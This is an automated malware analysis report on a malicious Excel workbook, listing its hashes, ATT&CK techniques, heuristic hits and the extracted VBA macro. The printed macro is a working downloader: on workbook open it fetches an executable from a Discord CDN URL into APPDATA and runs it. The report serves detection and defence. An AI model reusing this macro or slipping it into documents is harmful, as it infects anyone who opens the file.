Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 76ce42bb3d5923d2…

MALICIOUS

Office (OOXML)

37.7 KB Created: 2021-05-27 08:33:09 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-29
MD5: 3fd0ad1b36586f7c3020cfad2bab3ce0 SHA-1: 70ae06167b637038c7892d7f12a82124c71edeab SHA-256: 76ce42bb3d5923d2fca1ab88ddbc5b906e6fccf988c10fd93b8f22d98693d7b1
98 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The Workbook_Open macro in the VBA script executes a function that downloads a file from the provided URL and saves it to the user's APPDATA directory as 'Runtime_Broker.exe'. The downloaded file is then executed. This indicates a downloader or droppper functionality.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
    Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
    Call YourSub
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe"
    sPath = Environ("APPDATA") & "\Runtime_Broker.exe"
    Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1528 bytes
SHA-256: 575eefd8e0fd850707881088dec0996b09d463c79e2297278c9767a4043de44d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong

Private Sub Workbook_Open()
Call YourSub
End Sub

Private Sub YourSub()
Dim sUrl As String, sPath As String
sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe"
sPath = Environ("APPDATA") & "\Runtime_Broker.exe"
Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
Call fExecuteUnicode(0, StrPtr("Open"), StrPtr(sPath), 0, 0, 1)
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 10240 bytes
SHA-256: 5a0be406ab06f0cad16493d86958c3280f102b33d4b788658fd235f0d8bdef99